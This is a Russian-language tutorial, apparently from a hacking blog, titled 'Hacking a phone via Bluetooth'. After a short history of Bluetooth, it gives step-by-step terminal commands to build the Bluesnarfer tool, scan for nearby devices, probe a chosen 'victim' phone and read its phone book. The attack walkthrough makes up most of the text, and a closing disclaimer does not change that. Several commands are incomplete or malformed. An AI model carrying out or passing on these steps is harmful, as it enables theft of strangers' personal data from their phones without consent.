Взламываем телефон через Bluetooth

Bluetooth — производственная спецификация беспроводных персональных сетей (Wireless personal area network). Bluetooth обеспечивает обмен информацией между персональными устройствами.

Спецификация Bluetooth была разработана группой Bluetooth Special Interest Group, которая была основана в 1998 году. Данная технология по сей день остается актуальной и используется во многих персональных устройствах.

В рамках данной статьи мы разберемся, насколько безопасна данная технология, а также разберем метод эксплуатации уязвимостей Bluetooth с помощью утилиты под названием Bluesnarfer.

Установка и эксплуатация

Открываем терминал и вводим команду для обновления пакетов:

sudo apt-get update && apt-get upgrade

Далее клонируем репозиторий с помощью команды:

git clone https://github.com/boos/bluesnarfer

Переходим в директорию:

cd bluesnarfer

И компилируем утилиту:

make

После того, как инструмент полностью боеспособен, включаем режим мониторинга на нашем Bluetooth-адаптере:

hciconfig hci0 up

Далее сканируем доступные устройства с включенным Bluetooth:

hcitool scan

Запоминаем MAC-адрес нашего целевого устройства. Теперь нам нужно убедиться в том, что устройство не спит:

l2ping

Просматриваем возможность подключения к жертве, используя rfcomm:

sdptool browse --tree --l2cap адрес жертвы>

Если устройство жертвы подходит под наши требования, то мы можем спокойно произвести атаку. Например, с помощью данной команды мы можем просмотреть телефонную книгу нашей жертвы:

bluesnarfer -r -b

Но это не все возможности данной утилиты. Для того, чтобы ознакомиться с полным функционалом инструмента, вводим команду для вывода справки:

bluesnarfer -h

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.